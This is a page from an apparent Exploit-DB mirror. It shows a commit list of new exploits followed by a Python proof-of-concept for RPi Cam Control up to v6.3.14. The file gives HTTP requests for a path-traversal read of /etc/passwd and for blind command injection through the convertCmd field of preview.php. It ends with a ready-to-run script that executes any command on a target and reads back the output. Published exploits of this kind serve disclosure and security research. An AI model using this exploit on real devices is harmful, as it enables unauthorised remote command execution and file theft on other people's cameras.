exploit-db-mirror/platforms/php/webapps/42452.py
Offensive Security 4df0e06052 DB: 2017-10-04
22 new exploits

All browsers - Crash
Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)
Microsoft Windows Kernel win32k.sys TTF Font Processing - Out-of-Bounds Read with Malformed _glyf_ Table (win32k!fsc_CalcGrayRow)
Microsoft Windows Kernel - win32k.sys .TTF Font Processing - Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath)
Microsoft Windows Kernel - .win32k.sys TTF Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow)

NoMachine 5.3.9 - Privilege Escalation

Microsoft Word 2007 (x86) - Information Disclosure

Apple Mac OS X + Safari - Local Javascript Quarantine Bypass

Australian Education App - Remote Code Execution

CenturyLink ZyXEL PK5001Z Router - Root Remote Code Execution

Trend Micro OfficeScan 11.0/XG (12.0) - MITM Remote Code Execution

UCOPIA Wireless Appliance < 5.1 (Captive Portal) - Unauthenticated Root Remote Code Execution

Web interface for DNSmasq / Mikrotik - SQL Injection
Web Interface for DNSmasq / Mikrotik - SQL Injection

Zyxel P-660HW-61 Firmware < 3.40(PE.11)C0 Router - Local File Inclusion

Uniview NVR - Password Disclosure

Nuevomailer < 6.0 - SQL Injection

IBM Informix Dynamic Server - Code Injection / Remote Code Execution

WordPress Plugin Sabai Discuss - Cross-Site Scripting

Tilde CMS 1.01 - Multiple Vulnerabilities

VACRON VIG-US731VE 1.0.18-09-B727 IP Camera - Authentication Bypass

JoySale 2.2.1 - Arbitrary File Upload
AirMaster 3000M - Multiple Vulnerabilities
RPi Cam Control < 6.3.14 - Remote Command Execution

iTech Movie Script 7.51 - SQL Injection

CMS Web-Gooroo < 1.141 - Multiple Vulnerabilities

PHP-SecureArea < 2.7 - Multiple Vulnerabilities

Humax Wi-Fi Router HG100R 2.0.6 - Authentication Bypass

Fiberhome AN5506-04-F - Command Injection
2017-10-04 05:01:32 +00:00

65 lines
No EOL
1.9 KiB
Python
Executable file

#####
# RPi Cam Control <= v6.3.14 (RCE) preview.php Multiple Vulnerabilities
#
# A web interface for the RPi Cam
# Vendor github: https://github.com/silvanmelchior/RPi_Cam_Web_Interface
#
# Date 16/08/2017
# Discovered by @nopernik (https://www.linkedin.com/in/nopernik)
#
# http://www.korznikov.com
#
# RPi Cam Control <= v6.3.14 is vulnerable to Local File Read and Blind Command Injection.
#
#
# Local File Read (get /etc/passwd file):
# ----------------
# POST /preview.php HTTP/1.1
# Host: 127.0.0.1
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# Content-Length: 80
#
# download1=../../../../../../../../../../../../../../../../etc/passwd.v0000.t
#
#
# Blind Command Injection:
# ------------------
# POST /preview.php HTTP/1.1
# Host: 127.0.0.1
# Content-Type: application/x-www-form-urlencoded
# Connection: close
# Content-Length: 52
#
# convert=none&convertCmd=$(COMMAND_TO_EXECUTE)
#
#
# Blind Command Injection can be used with Local File Read to properly get the output of injected command.
#
# Proof of concept:
#####
#!/usr/bin/python
import requests
import sys
if not len(sys.argv[2:]):
print "Usage: RPi-Cam-Control-RCE.py 127.0.0.1 'cat /etc/passwd'"
exit(1)
def GET(target, rfile):
res = requests.post("http://%s/preview.php" % target,
headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
data={"download1": "../../../../../../../../../../../../../../../../{}.v0000.t".format(rfile)})
return res.content
def RCE(target, command):
requests.post("http://%s/preview.php" % target,
headers={"Content-Type": "application/x-www-form-urlencoded", "Connection": "close"},
data={"convert": "none", "convertCmd": "$(%s > /tmp/output.txt)" % command})
return GET(target,'/tmp/output.txt')
target = sys.argv[1]
command = sys.argv[2]
print RCE(target,command)